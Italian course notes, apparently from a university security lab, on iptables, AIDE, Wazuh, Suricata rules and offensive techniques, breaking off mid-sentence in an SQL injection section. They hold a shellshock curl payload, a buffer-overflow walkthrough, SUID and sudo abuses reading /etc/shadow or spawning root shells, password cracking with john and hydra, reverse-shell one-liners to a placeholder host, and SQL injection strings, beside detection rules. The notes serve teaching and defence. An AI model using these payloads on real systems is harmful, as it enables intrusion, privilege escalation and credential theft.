# append di una nuova regola
sudo iptables [-t table] -A chain rule-specification
# controllo sulla presenza di una regol
sudo iptables [-t table] -C chain rule-specification
# rimozione di una regola
sudo iptables [-t table] -D chain rule-specification
sudo iptables [-t table] -D chain rulenum
# flush delle regole
sudo iptables [-t table] -F [chain [rulenum]] [options...]
# elenco delle regole
sudo iptables [-t table] -L [chain [rulenum]] [options...]
# azzeramento dei contatori dei byte
sudo iptables [-t table] -Z [chain [rulenum]] [options...]
# creazione nuova catena
sudo iptables [-t table] -N chain
# rimozione catena (non devono esserci riferimenti alla catena eliminata)
sudo iptables [-t table] -X [chain]
# policy di default
sudo iptables [-t table] -P chain target

# dove
rule-specification = [matches...] [target]
match = -m matchname [per-match-options]
target = -j targetname [per-target-options]
```

I target di default sono `ACCEPT`, `DROP`, `RETURN`. È possibile anche usare il nome di una catena custom come target per far sì che i pacchetti vengano filtrati anche da quella catena. Finita l'esecuzione della catena custom i pacchetti continuano ad essere filtrati seguendo il percorso normale.

Filtri generali:

```bash
# [!]-p <proto>						protocollo, valori tra tcp,
#									udp, icmp, esp, ah, all
# [!]-s <addr[/mask]>				indirizzo sorgente
# [!]-d <addr[/mask]>				indirizzo destinazione
# [!]-i <int>						NIC ingresso
# [!]-o <int> 						NIC uscita
# -j target							salta al target
# -m match							usa una estensione
```

Estensioni generali:

```bash
# -m mac
#	[!] --mac-source <src-mac>		Filtra sul mac sorgente.
#									Solo nelle tabelle
#									PREROUTING, FORWARD, INPUT
#
# -p tcp
#	[!] --sport <port>				Filtra sulla porta sorgente
# 	[!] --dport <port>				Filtra sulla porta di destinazione
#	[!] --tcp-flags <unset> <set>	Filtra sui flag dei pacchetti tcp.
#									Accetta due elenchi separato da virgole.
#									Valori possibili sono: SYN, ACK, FIN,
#									RST, URG, PSH, ALL
#
# -p udp
#	[!] --sport <port>				Filtra sulla porta sorgente
# 	[!] --dport <port>				Filtra sulla porta di destinazione
#
# -p icmp
#	[!] --icmp-type <type>			Filtra sul tipo di pacchetto icmp
#									Valori possibili: echo-reply, echo-request
#									Altri valori con iptables -p icmp -h
#
# -m iprange
#	[!] --src-range <from[-to]>		Filtro sugli indirizzi sorgente
#	[!] --dst-range <from[-to]>		Filtro sugli indirizzi di destinazione
#
# -m multiport
#	[!] --sports <port[,port]>		Filtro sulle porte sorgente
#	[!] --dports <port[,port]>		Filtro sulle porte di destinazione
#	[!] --ports <port[,port]>		Filtro sulle porte
#
# -m state
#	[!] --state <state[,state]>		Elenco di stati fra:
#									INVALID, ESTABLISHED, NEW,
#									RELATED, UNTRACKED
```

Estensioni dei target:

```bash
# SNAT								Valido solo nella tabella NAT
#									nelle tabelle POSTROUTING e INPUT
#	--to-source <ipaddr>[-ipaddr][:port[-port]]
#	--random
#
# DNAT								Valido solo nella tabella NAT
#									nelle catene di PREROUTING e OUTPUT
#	--to-destination <ipaddr>[-ipaddr][:port[-port]]
#	--random
#
# LOG								Logga i pacchetti
# 	--log-level <level>				level scelto tra emerg, alert, crit,
#									error, warning, notice, info or debug
#	--log-prefix <prefix>			Prefisso per il log
# 	--log-uid						Log dell'uid associato al pacchetto
```

Esempi di configurazione:

```bash
# loopback
sudo iptables -I INPUT -i lo -j ACCEPT
sudo iptables -I OUTPUT -o lo -j ACCEPT

# syslog
sudo iptables -I INPUT -p udp -s 10.1.1.0/24 -d 10.1.1.254 \
	--dport 514 -j ACCEPT
sudo iptables -I OUTPUT -p udp -d 10.1.1.0/24 -s 10.1.1.254 \
	--sport 514 --state ESTABLISHED -j ACCEPT

# ldap
sudo iptables -I INPUT -p tcp -s 10.1.1.0/24 -d 10.1.1.254 \
	--dport 389 -j ACCEPT
sudo iptables -I OUTPUT -p tcp -d 10.1.1.0/24 -s 10.1.1.254 \
	--sport 389 --state ESTABLISHED -j ACCEPT

# snmp
sudo iptables -I OUTPUT -p udp -s 10.9.9.254 -m iprange \
	--dst-range=10.9.9.1-10.9.9.10 --dport 161 -j ACCEPT
sudo iptables -I INPUT -p udp -d 10.9.9.254 -m iprange \
	--src-range=10.9.9.1-10.9.9.10 --sport 161 \
	--state ESTABLISHED -j ACCEPT

# ssh
sudo iptables -I OUTPUT -p tcp -s 10.9.9.254 -m iprange \
	--dst-range=10.9.9.1-10.9.9.10 --dport 22 -j ACCEPT
sudo iptables -I INPUT -p tcp -d 10.9.9.254 -m iprange \
	--src-range=10.9.9.1-10.9.9.10 --sport 22 \
	--state ESTABLISHED -j ACCEPT

# forward dal server al client permesso
sudo iptables -I FORWARD -s $SERVER -d $CLIENT -p tcp \
	--dport $PORT -j ACCEPT
# forward dal client al server per le connessioni già stabilite
sudo iptables -I FORWARD -d $SERVER -s $CLIENT -p tcp \
	--sport $PORT -m state --state ESTABLISHED -j ACCEPT

# Abilito log dei pacchetti
sudo iptables -I OUTPUT -i eth2 -d $ipc -s $myIP -j LOG \
	--log-level 'info' --log-prefix " in_uscita "

# Abilito log dei pacchetti
sudo iptables -I INPUT -i eth2 -s $ipc -d $myIP -j LOG \
	--log-level 'info' --log-prefix " in_ingresso "

# Disabilito log dei pacchetti
sudo iptables -D OUTPUT -i eth2 -d $ipc -s $myIP -j LOG \
	--log-level 'info' --log-prefix " in_uscita "

# Disabilito log dei pacchetti
sudo iptables -D INPUT -i eth2 -s $ipc -d $myIP -j LOG \
	--log-level 'info' --log-prefix " in_ingresso "

# blocco nuove connessioni SSH ai server
sudo iptables -I OUTPUT -d 10.9.9.0/24 -p tcp --dport 22 \
	--syn -j DROP
sudo iptables -I OUTPUT -o eth1 -m iprange -s $IP \
	--dst-range "10.9.9.1-10.9.9.100" -p tcp --dport 22 -m state \
	--state NEW -j DROP

# sblocco nuove connessioni SSH ai server
sudo iptables -D OUTPUT -d 10.9.9.0/24 -p tcp --dport 22 \
	--syn -j DROP
sudo iptables -D OUTPUT -o eth1 -m iprange -s $IP \
	--dst-range "10.9.9.1-10.9.9.100" -p tcp --dport 22 -m state \
	--state NEW -j DROP

# bloccare ognui nuova connessione dal client $2 verso i server
sudo iptables -I FORWARD -s "$2" -d 10.9.9.0/24 -p tcp --syn -j DROP

# contare il traffico tramite iptables
# parametro $1 --> un ip
function set_rules()
{
    if [ "$2" = "open"] ; then
        # Apro la connessione inserendo una catena per contare il traffico
        iptables -N "C_$1"
        iptables -I "C_$1" -j ACCEPT
        iptables -I FORWARD -i eth3 -s "$1" -j "C_$1"
        iptables -I FORWARD -o eth3 -d "$1" -j "C_$1"

    elif [ "$2" = "close" ] ; then
        # Rimuovo la connessione
        iptables -D FORWARD -i eth3 -s "$1" -j "C_$1"
        iptables -D FORWARD -o eth3 -d "$1" -j "C_$1"
        iptables -F "C_$1"
        iptables -X "C_$1"
    fi
}
# uso (nell'esempio $SOURCE è un ip)
DIMENSIONE=$(iptables -Z -vxnL C_$SOURCE | grep ACCEPT | awk '{ print $2 }' 2>/dev/null)
```

Comandi generali

```bash
# mostra le catene
sudo iptables [-t tab] -vnL

# mostra i contatori
sudo iptables -vnxL -Z > contatori
```

#  HIDS

## AIDE

AIDE è un sistema di rilevamento delle intrusioni che rileva le modifiche ai file sul sistema locale. Crea un database dalle regole delle espressioni regolari che trova dal file di configurazione. Una volta inizializzato questo database può essere utilizzato per verificare l'integrità dei file.

### Configurazione standard

Il file di configurazione generale si trovano in `/etc/default/aide/`, le regole e le configurazioni specifiche in `/etc/aide/`, il database in `/var/lib/aide/`.

Per prima cosa occorre creare la prima versione del database che viene posizionato di default in `/var/lib/aide/aide.db.new`

```bash
# può impiegare parecchio tempo
sudo aideinit
```

A questo punto occorre posizionare il database nel path corretto ed aggiornare la configurazione di AIDE

```bash
# sovrascrive il vecchio db se esiste
sudo cp /var/lib/aide/aide.db{.new,}
# aggiorna la configurazione. Crea il file
# /var/lib/aide/aide.conf.autogenerated
sudo update-aide.conf
# sovrascrive il file di configrazione di default con
# quello appena generato
sudo cp /var/lib/aide/aide.conf.autogenerated /etc/aide/aide.conf
```

A questo punto abbiamo una versione di AIDE configurata e possiamo lanciare una verifica di coerenza tra il database ed i file nel sistema

```bash
# verifica l'integrità del sistema
# -C					check, controlla il database alla ricerca
#						di violazioni dell'integrità
# -c <file>				file di configurazione
# --limit <REGEX>		limita i controlli alla dir passata
sudo aide -c /etc/aide/aide.conf -C
sudo aide -c /etc/aide/aide.conf --limit /etc -C

# creando dei file nuovi in directory sensibili con /etc
# e lanciando nuovamante il comando si nota un warning
```

Anziché limitare i controlli a mano è possibile modificare il file di configurazione `aide.conf` per escludere certe directory o per limitare la ricerca all'elenco di directory passate.

```bash
# inserire in fondo al file
!/home/			# esclude la home
!/var/lib/		# esclude /var/lib
!/proc			# eclude /proc
/etc/			# limita a /etc
```

### Configurazione custom

Il file di configurazione custom contiene queste righe

```bash
# Path del database
database=file:/home/sec/aide/aide.db
database_out=file:/home/sec/aide/aide.db.new
database_new=file:/home/sec/aide/aide.db.new

# Regole custom
# p = permission
# n = number of links
# u = user
# g = group
# m = modification time
# c = inode/file change time
# xattrs = extended file attributes
# md5 = checksum
# sha512 = checksum
SecLabRule=p+n+u+g+s+m+c+xattrs+md5+sha512

# Dir o file da monitorare con le regole
#/etc SecLabRule
#/bin SecLabRule
#/usr/bin SecLabRule
/home/sec SecLabRule

# Dir da ignorare
!/root
```

Una volta creato il file custom possiamo inserirlo all'interno della directory `~/aide` ed inizializzare il nuovo database

```bash
cp aide.conf ~/aide/aide.conf
# inizializza il db con il file di configurazione specificato
sudo aide -c ~/aide/aide.conf --init
# come prima copiamo il database
cp ~/aide/aide.db{.new,}
# verifichiamo la correttezza delle configurazioni. Se tutto ok
# il codice di ritorno deve essere 0
sudo aide -c ~/aide/aide.conf --config-check
```

A questo punto è possibile effettuare dei controlli di integrità usando il nuovo file di configurazione

```bash
sudo aide -c ~/aide/aide.conf -C
```

Altre configurazioni consentono di inviare delle email ad un utente/indirizzo specifico modificando l'opzione `MAILTO` all'interno del file di configurazione. Per inviare la notifica ad un indirizzo email è necessario impostare correttamente il MTA del sistema.

È anche possibile far eseguire i controlli di aide con degli scheduler come `cron`

```bash
sudo crontab -e
# esegui ogni dieci minuti il comando aide <...> && cp <...>
# */10 * * * * aide -c /home/sec/aide/aide.conf -u \
#	&& cp /home/sec/aide/aide.db{.new,}
```

## Wazuh

Wazuh è un HIDS open-source customizzabile e molto usato in ambito aziendale.

Per prima cosa occorre installare l'agent wazuh sulla macchina da monitorare

```bash
sudo apt install curl
curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | sudo apt-key add -
echo "deb https://packages.wazuh.com/4.x/apt/ stable main" | \
	sudo tee -a /etc/apt/sources.list.d/wazuh.list
sudo apt update
sudo apt install wazuh-agent
```

A questo punto occorre configurare l'agente modificando il file di configurazione `/var/ossec/etc/ossec.conf` modificando `<address>MANAGER_IP</address>` con `<address>10.10.10.10</address>`, ovvero l'ip del manager.

Per far sì che l'agent comunichi col manager occorre usare la connessione VPN fornita all'interno del file `wazuh-vpn.ovpn`. A questo punto è possibile collegarsi con username e password istituzionali e registrare l'agent.

```bash
sudo /var/ossec/bin/agent-auth -m 10.10.10.10 -I any \
	-A "vostro_nome_utente_unibo" # (es. "andrea.melis6")
```

Occorre ora riavviare l'agent

```bash
sudo systemctl restart wazuh-agent
```

A questo punto la VM  è registrata presso il manager, questo significa che l'agent sulla VM è attivo e monitora ogni attività sospetta o potenzialmente pericolosa. Queste attività, segnate sotto forma di alert, vengono inviate al wazuh-manager. Il wazuh-manager può visualizzarle in modo più significativo e “user-friendly” per verificare l'andamento a runtime di tutti i dispositivi monitorati da un wazuh-agent.

Oltre al semplice monitoraggio e visualizzazione wazuh-manager può anche impostare una active-response, un'azione che si scatena ogni qual volta un'attività sospetta viene rilevata e inviata da uno degli agent. Ad esempio se su uno degli agent viene rilevato un tentativo di attacco brute-force SSH, proveniente dall'IP 1.2.3.4 l'agent rivela l'attacco e invia l'alert al wazuh-manager. Il manager attiva un'azione che può ad esempio mandare una mail a tutti gli amministratori dei nodi monitorati segnalando l'attacco o attivare uno specifico script sull'agent che ha inviato l'alert per bloccare l'ip 1.2.3.4.

Lo scopo è quindi simulare un attacco shellshock e attivare una active response da parte del manager. L'agent sulla VM è configurato per allertarsi a seguito di un tentativo di attacco di questo tipo. La regola che implementata per questo tipo di attacco è la seguente:

```xml
<rule id="31168" level="15">
    <if_sid>31101,31108</if_sid>
    <regex>"\(\)\s*{\s*:;\s*}\s*;|"\(\)\s*{\s*foo:;\s*}\s*;|"\(\)\s*{\s*ignored;\s*}\s*|"\(\)\s*{\s*gry;\s*}\s*;</regex>
    <description>Shellshock attack attempt</description>
    <info type="cve">CVE-2014-6271</info>
    <info type="link">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271</info>
    <group>attack,pci_dss_11.4,gdpr_IV_35.7.d,nist_800_53_SI.4,</group>
</rule>
```

Lo scopo è quindi simulare un attacco shellshock verso il server ngnix locale, facendo in modo che nei log di nginx che si trovano su `/var/log/ngnix/access.log` venga loggato un accesso che scateni l'alert per un attacco shellshock.

Una volta completata la configurazione e riavviato l'agent è sufficiente eseguire un comando curl con header custom per scatenare la vulnerabilità.

```bash
curl --insecure localhost -H "User-Agent: () { :; }; /bin/cat /etc/passwd"
```

# Suricata

> **Importante**: leggere la [documentazione](https://suricata.readthedocs.io/en/suricata-4.1.2/what-is-suricata.html) per evitare simpatici inconvenienti nelle regole

Le regole di suricata hanno un formato fisso.

1. Azione (drop, alert, pass, reject, log)
2. Intestazione
   1. protocollo (ip, tcp, udp, icmp, any)
   2. indirizzo sorgente
   3. direzione (`->` da a, `<>` bidirezionale)
   4. indirizzo destinazione
3. Opzioni
   * metasetting
     * msg
     * sig
     * rev
     * content
   * keyword sul payload
   * keyword specifiche dei protocolli

Esempi di regole

```
alert icmp any any -> any any (msg:"Ping detected"; itype:8; sid:1000477; rev:1;)

alert tls any any -> any any (msg:"SURICATA TRAFFIC-ID: facebook"; tls_sni; content:"facebook.com"; isdataat:!1,relative; flow:to_server,established; flowbits: set,traffic/id/facebook; flowbits:set,traffic/label/social-network; sid:300000001; rev:1;)

alert http any any -> any any (msg:"Volex – Possible CVE-2014-6271 bash Vulnerability Requested (header)"; flow:established,to_server; content:"() {"; http_header; threshold:type limit, track by_src, count 1, seconds 120; sid:2014092401;

alert tcp any 1883 <> any any (msg:"MQTT found"; content: "flag"; sid: 300000003; rev:1;)
```

L'uso standard di suricata prevede le seguenti opzioni

```bash
# -c 				file di configurazione
# -i 				interfaccia da cui prendere i pacchetti
# -s				file aggiuntivo delle firme
# -l				cambia la cartella dei log
#					default=/var/log/suricata
# -D 				avvia come demone
sudo suricata -c <config> -i <nic> -s <sign> -l <log-dir> -D
# -r 				input da file pcap
sudo suricata -c <config> -r <file>
```

I file pcap possono essere generati sia con wireshark sia con tcpdump.

È possibile istruire suricata a salvare il payload dei pacchetti sospetti all'interno di `/var/log/suricata/eve.json`, occorre impostare la proprietà `types ->alert->payload-printable:yes` per ottenre il dump del payload.

Per controllare il file `eve.json` è comodo usare jq

```bash
# grep
grep string
jq 'select(.key == "string")'
jq 'select(.key == "string" and .other-key == "other_string")'

# regex
grep -E '(string|[bm]other)'
jq 'select(test("(string|[bm]other)"))'
```

Comando utile per stampare solo i payload:
```bash
sudo apt install jq
cat eve.json | jq 'select(.event.type="alert")'| grep 'payload'
```

## Regole

### Regole tcp

```
# numero di sequenza
seq:<num>;

# flag ack attivo
ack:1;
```

###  Regole ICMP

* Codice 0: echo reply
* Codice: echo request

```
# tipo
itype:min<>max;
itype:[<|>]<num>;
```

### Regole payload

```
# contenuto, può essere usato più volte
content: ”............”;

# ignora la distinzione tra maiuscole e minuscole
# posizionato dopo il content a cui fa riferimento
nocase;

# numero di byte dall'inizio del payload da controllare
# segue content
depth:<num>;

# controlla se il payload inizia con una certa sequenza
# segue content, non va mischiata con depth
startswith;

# dopo quanti byte iniziare a controllare il payload
# segue content
offset:<num>
```

### Regole flusso

```
# controlla il flusso dei dati
# to_client, to_server, from_client, from_server, established, not_established
flow: <val>;
```

### Regole HTTP

```
# metodo http, GET o POST
# da specificare dopo content
# content:"POST"; http_method;
http_method;

# controllo sull'uri, segue content
# da specificare dopo content
# content:"/index"; http_uri
# content:"/index"; http_raw_uri
http_uri;

# header http, segue content
# content:"www.google.com"; http_header;
# content:"KEEP-ALIVE"; nocase; http_header;
http_header;

# controllo sui cookie, segue content
http_cookie;

# controllo sullo user_agent, segue content
http_user_agent;
```

### Regole SSL/TLS

```
# nome del server
# tls_sni; content:"oisf.net"; nocase;
tls_sni;

# nome del subject
# tls.subject:"CN=*.googleusercontent.com"
tls.subject

# certificato scaduto/valido
tls_cert_expired;
tls_cert_valid;

# date del certificato
# tls_cert_notbefore:1998-05-01<>2008-05-01;
# tls_cert_notafter:>2015
tls_cert_notafter:<data>;
tls_cert_notbefore:<data>;

# versione di ssl/tls
tls.version:<ver>;
ssl_version:<ver>;

# stato di ssl
# client_hello, server_hello, client_keyx, server_keyx, unknown
# anche come lista separata da |
ssl_state <state>;
```

# Exploit binari

Tra gli exploit binari abbiamo visto il buffer overflow. Per prima cosa occerre installare una versione particolare di gcc per poter compilare il codice in maniera vulnerabile (senza canarini e con lo stack eseguibile).
```bash
sudo apt-get install gcc-multilib
```

Dopo di che il codice vulnerabile va complilato come segue:
```bash
# -fno-stack-protector  disabilita i canarini
# -m32 compila per architettura a 32 bit
# -z execstack rende lo stack eseguibile
gcc -o <nome_prog> -fno-stack-protector -m32 -z execstack <nome_file>.c
```

A questo punto va inibita la capacità del kernel di randomizzare gli indirizzi di memoria:
```bash
# andrebbe bene anche
# echo 0 > /proc/sys/kernel/randomize_va_space
# ma per essere eseguito occorrerebbe essere root
# con il comando sotto si può restare sec
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
```

Quindi per concludere si assegna il binario a root e si setta il SUID per fare priv esc
```bash
sudo chown root:root <nome_prog>
sudo chmod u+s <nome_prog>
```

Ora che l'enviroment è predisposto è necessario avviare il programma vulnerabile con il compilatore per ottenere il disassemblato quando avviene l'errore di stack overflow.
```bash
# L'exploit lancia una shell dell'utente che ha lanciato gdb,
# quindi per ottenere una shell di root occorre lanciare gdb
# come root
sudo gdb <path_programma>
```

Si disassembla ora la funzione main per capire quali funzioni contiene all'intero. Questo è utile quando non si ha il codice sorgente. I nomi delle funzioni sono tra <>.
```bash
disas main
```

Individuata la funzione si può allo stesso modo disassemblarla per vedere quali altre chiamate a funzione fa. Si è in cerca di funzioni di input vulnerabili.
```bash
disas <nome_funzione>
```

Ora è possibile dal debugger eseguire il programma passando uno o più parametri.
```bash
run <valore>
```

Gdb accetta anche scripting con Python, così da fare esplodere programmi che sono vulnerabili ma magari hanno array dove viene memorizzato l'input molto grandi.
```bash
run $(python -c "print('A'*120)")
```
Con il comando nella box precedente è possibile eseguire il programma vulnerabile con parametro una stringa di 120 "A". Questo permette di capire quanto è grande il buffer da fare traboccare, si prova fino a che non esplode.

Fatto traboccare il buffer è necessario capire quanto è grande l'indirizzo di ritorno scritto immediatamente sopra per poterlo in seguito sostituire con uno ad-hoc. Per farlo si trova il numero esatto per cui il programma esplode poi si aggiungono caratteri tutti uguali. Lo scopo e ottenere un indirizzo di ritorno formato dal codice ASCII relativo al carattere usato (ad esempio con B si ottiene 0x42424242)
```bash
run $(python -c "print('A'*112+'BBBB')")
```
Si noti che le B sono quattro perchè il codice è compilato per architettura 32 bit.

E' possibile visualizzare anche tutto lo stack per vedere come è composto. Potrebbe essere che non sia perfettamente allineato, ad esempio lo stato dello stack dovuto alla box prima potrebbe avere le quattro B in due indirizzi diversi.
```bash
x/200xw $esp
```
Con il comando sopra si mostra i 200 byte dello stack, dobbiamo trovare l'indirizzo di ritorno valido, lo shellcode sarà preceduto da operazioni NOP, quindi di norma un indirizzo di ritorno valido è l'indirizzo della prima riga in cui ci sono tutte A ('41'), il consiglio è se non funziona provare tutti gli indirizzi delle righe in cui compaiono A, prima o poi funzioina.

A questo punto si è scoperto il valore che scatena l'overflow, si ha il controllo dell'indirizzo di ritorno è quindi possibile fare traboccare il buffer e scrivere nell'indirizzo di ritorno il valore di un indirizzo pilotato che punta ad una funzione che permette di ottenere una shell.

A questo punto è importante posizionare bene tutto nella memoria. Si prende la dimensione del buffer scoperta prima, si sottrae la dimensione dello shell code e si ottine in questo modo la seguente stringa da inserire nel comando python: `'\x90' * (dimensione_buffer - dimension_shellcode) + <shellcode> + <indirizzo_di_ritorno_trovato>`

```bash
./<nome_prog> $(python -c "print('\x90'*66 + '<shellcode>' + '<indirizzo_di_ritorno_trovato>')")
```
Il buffer contiene un payload che permette di ottenere una shell e x90 che sono operazioni di nop che non sono altro che del riempimento per riuscire a far traboccare lo stack. L'indirizzo di ritorno abilmente sovrascritto punta al codice payload scritto nel buffer



Comandi utili:

```bash
# stampa indirizzo e nome della funzione
info functions
# imposta un brakpoint ad un indirizzo in memoria
b *<indirizzo>
```
# Privilege escalation

È possibile effettuare una privilege escalation modificando il bit `SUID` di alcuni comandi, sfruttando le ACL POSIX, oppure usando le capability Linux.

## Bit `SUID`

È possibile impostare il bit `SUID` del comando `find` ad esempio per fargli eseguire azioni arbitrarie sui file trovati tramite l'opzione `-exec`

```bash
# find è di proprietà di root
-rwxr-xr-x 1 root root 315904 Feb 16  2019 /usr/bin/find

# impostare il bit SUID, non è realistico ma va bene lo stesso
sudo chmod u+s /usr/bin/find

# trova tutti i file *.md e stampane le informazioni
find /home/sec -type f -name "*.md" -exec "file{} ;"
# cancella tutti i file in /etc
find /etc -type f -na -exec "rm {}"
# apri una porta privilegiata
find /any/file -exec nc -l -p 80 \; 
# leggi il file delle password
find /etc/shadow -exec cat {} \; 
```

Possiamo anche modificare altri programmi per ottenere altri effetti, come ad esempio `cp`.

```bash
# SUID a cp
sudo chmod u+s /bin/cp
# possiamo sovrascrivere /etc/passwd con un altro file
cp my_passwd /etc/passwd
```

Comandi utili:
```bash
# trova tutti i file con SUID settato e come owner root
find / -perm +4000 
# trova tutti i file con SGID settato e come owner root
find / -perm +2000 
# i due comandi sopra in un sol colpo !!!
find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \; 
```

## ACL POSIX
Le ACL POSIX permettono di avere un controllo più granulare dei diritti di accesso su i file. Con le ACL POSIX è possibile assegnare singoli diritti a singoli utenti, per farlo:
```bash
# questo comando assegna diritti di lettura e scrittura ad <utente> su <file>
setfacl -m u:<utente>:rw <file>
# equivale a ls -l ma mosta anche le ACL POSIX
getfacl -sR <file oppure path> 
# mostra tutti i file nel fs che hanno ACL POSIX settato
getfacl --recursive --skip-base / 
```

È possibile trovare tutti i file con le ACL impostate a valori diversi da quelli di default con

```bash
# -type f		file regolari
# -exec 		esegui il comando che segue exec
#				\; è il delimitatore del comando, Fa sì che
#				il comando venga invocato tante volte quante sono
#				le rghe di output. Il delimitatore + concatena tutte
#				le righe di output e chiama il comando con la
#				stringa risultante
#				{} è un segnaposto che indica dove
#				inserire gli argomenti
find <path> -type f -exec getfacl -s {} +
# -R			ricorsivo
# -s			non stampare i file che hanno permessi
#				ugauli a quelli base
getfacl -Rs <path>
```

## Capability

È possibile assegnare una capability con il comando:
```bash
# assegna a chmod la capacità di ignorare il meccanismo DAC di Linux
sudo setcap CAP_DAC_OVERRIDE=eip /bin/chmod
# eseguibile che ignora la coerenza di ownership tra processo e file
sudo setcap CAP_FOWNER=eip /bin/chmod
# trova tutti i file nel fs che hanno capability settata
getcap -r / 
# lista delle capability
man 7 capabilities
```

È possibile trovare tutti i file che hanno capability assegnate tramite

```bash
 sudo find . -exec getcap {} \;
```

## File sudoers

Modifichiamo il file `/etc/sudoers` affinché l'utente `otheruser` possa eseguire `vi` senza password all'interno di `/vat/www/html`

```bash
sudo visudo /etc/sudoers
# aggiungere al file la riga
otheruser ALL=(root) NOPASSWD: /usr/bin/vi /var/www/html/*
```

Per elencare i permessi dati da `sudo` ad un utente non privilegiato

```bash
sudo -l
```

L'utente `otheruser` può lanciare tutti questi comandi, leciti o meno

```bash
# aprire il file
sudo /usr/bin/vi /var/www/html/file_a_caso
# a questo punto si può lanciare da vi
# :!bash per aprire una shell root

# altra possibilità meno lecita
sudo /usr/bin/vi /var/www/../../../etc/passwd
```

# Hash

Per fare il cracking delle hash una prima soluzione è Jonh, è più potente e veloce di hashcat e si invoca in maniera più semplice:

```bash
# --wordlist			wordlist
# --format				tipo di hash, in generale ci pensa da 
#						solo a trovalo, ma una mano non fa male a volte.
john --wordlist=<wordlist> --format=<fmt> <file_con_gli_hash>
# mostra i risultati, se nell'invocazione era stato passato 
# --format, va rimesso anche qua
john --format=<fmt> <file_con_gli_hash> --show
```

Altra soluzione se il pc ci mette una vita a crackare l'hash è: https://crackstation.net/

Se è proprio indispensabile usare hashcat, invece di cercare a mano ogni volta nella documentazione il codice del tipo di hash si può usare hashid:

```bash
# già installato nella VM
hashid <hash>
# molto migliore, va clonato il repo 
# https://gitlab.com/kalilinux/packages/hash-identifier.git
python3 ./hash-id.py <hash>
```

Ritorna una quale tipo di hash potrebbe essere e il codice hashcat.


Per riuscire a fare il crack delle password in formato /etc/passwd si usa un tool complementare di jonh:

```bash
unshadow /etc/passwd /etc/shadow > pass_to_crack # crea un file di testo con il mix delle informazioni contenute in passwd e shadow
john pass_to_crack # fa il crack di tutto quello che riesce
john pass_to_crack --show # mostra le password crackate

```

John riesce anche a scoprire la password di un archivio, per farlo è sufficiente:

```bash
# zip2john è un programma complementare di John
# per crackare i file zip
zip2john file.zip > crackzip.hash
john crackzip.hash --wordlist <wordlist>

# rar2john è un programma complementare di John
# per crackare i file zip
rar2john file.rar > crackrar.hash
john crackrar.hash --wordlist <wordlist>
```

Si possono anche creare wordlist personalizzate, le possibilità sono due:

* `cewl` : genera una wordlist da un sito web
* `cupp` : genera una wordlist chiedendo informazioni personali della vittima, deve essere preceduta da una fase di social engineering

```bash
# -d imposta la profondità di ricerca
# -m è il numero minimo di caratteri delle password generate
cewl -w customwordlist.txt -d 5 -m 7 google.it
```

```bash
# dopo averlo lanciato si seguono le istruzioni che
# chiedono le informazioni della vittima
cupp
```

# Vulnerabilità Web

## Enumerazione rete

Per scansionare una rete e trovare gli host presenti e le porte aperte.

```bash
# ping scan, non trova le porte
nmap -sn <ip-net>
# trova OS, porte aperte, versione del servizio che c'è dietro
nmap -A <ip>      	

# -sC 				lancia tutti gli script che conosci
# -sV				trova la versione del servizio dietro alla porta
# -oA				stampa l'output in vari formati (gnmap, nmap, xml)
# -Pn				usa i pacchetti ICMP
nmap -sC -sV -oA <out> -Pn <ip>

# -sT				test con l'apertura di connessioni
nmap -sT <ip>
```

Ci sono altri strumenti come `masscan` che è ottimizzato per la ricerca delle porte in reti molto grandi (ha performance migliori rispetto ad `nmap`)

## Enumerazione risorse

Una volta scoperto che è presente un web server si può fare l'enumerazione di tutte le risorse presenti. Si possono usare strumenti come:

* `dirb`
* `gobuster`
* `wfuzz`

```bash
gobuster -w <wordlist> -u <url>
```

```bash
dirb <target>
```
```bash
wfuzz -c -z file,<wordlist> --hc 404 <ip_target>/FUZZ
```

## Bruteforce
Il bruteforcing tenta tutte le possibilità per indovinare un campo dati, spesso un login. Il tool migliore è hydra anche se spesso è più rapido scrivere uno script in Python. In hydra è necessario passare nell'ordine:
* `ip del target`
* `wordlist di nomi utente`
* `wordlist di nomi utente`
* `modulo hydra`

Poi tra gli apici:
* `percorso della richiesta da attaccare senza dominio`
* `elemento che permette di capire che il tentativo non è andato a buon fine`
* `H=<header http> (ad esempio cookie di sessione)`

ogniuno di questi punti è separato da ":". Il punto della richiesta dove hydra dovrà mettere utente testato è indicato con `^USER`, il punto in cui hydra dovrà mettere la password testata è indicato con `^PASS`

Esempio: bruteforce di una richiesta http GET in una pagina protetta da un cookie di sessione.
```bash
# se username è noto -l <user> se psw è nota -p <password>
hydra <target_ip> -L <wordlist_usr> -P <wordlist_pass> http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect:H=Cookie\:PHPSESSID=1pugtqp1s5rt6l84bcba050k6s; security=low"
```

## Reverse shell
Permette di ottenere una shell remota. Può essere usata facilmente quando si ha la possibilità di eseguire un comando sulla macchina remota.

Per prima cosa è necessario aprire una socket in ascolto con Netcat perchè sia pronta a ricevere le richieste da parte della macchina remota:
```bash
nc –lvpp <porta>
```

 A questo punto la remote shell può essere ottenuta con:
* `Netcat (nc)`
* `Python`

```bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<host>",<porta>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

```bash
nc -e /bin/sh <host> <porta>
```

Una volta ottenuta una shell questa non è interattiva, cosa scomodissima, se la macchina ha un interprete Python è possibile avviare una remote shell interattiva:

```bash
python -c 'import pty; pty.spawn("/bin/bash")'
```

La Reverse Shell può essere ottenuta in maniera estremamente semplice con Metasploit, se però la connessione si chiude bisogna riavviare Metasploit per ripristinarla:

```bash
use multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST <host>
set LPORT <port>
exploit
```
Di fatto Metasploit non fa altro che iniettare una Reverse Shell PHP.

## SQLInjection

### A mano

Per prima cosa è necessario capire se il servizio è vulnerabile ad SQLInjection, la prima cosa da fare è tentare il carattere apice (') per vedere se la pagina ritorna qualche tipo di errore.

Se il sistema è vulnerabile si può eludere una clausola where con:

```
' OR 1=1--
' OR 1=1# (Solo se MySQL)
```
Per capire quante colonne ha la query vulnerabile si può usare group by:

```
' order by 1--
' order by 2--
' order by 3--
etc fino a che non c'è un errore
```

Se l'errore è scatenato con n ci sono n-1 colonne, ad esempio la query:

```
